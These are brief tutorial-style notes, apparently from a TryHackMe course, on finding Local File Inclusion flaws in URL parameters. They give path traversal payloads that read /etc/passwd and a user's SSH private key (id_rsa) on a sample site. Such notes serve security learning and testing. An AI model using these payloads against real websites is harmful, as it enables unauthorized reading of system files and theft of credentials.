# Local File Inclusion
To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).

## Usage

* Exploit URL parameter
```
http://example.com/home?page=about.html
```
    * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
    ```
    http://example.com/home?page=../../../../etc/passwd
    ```
    or
    ```
    http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
    ```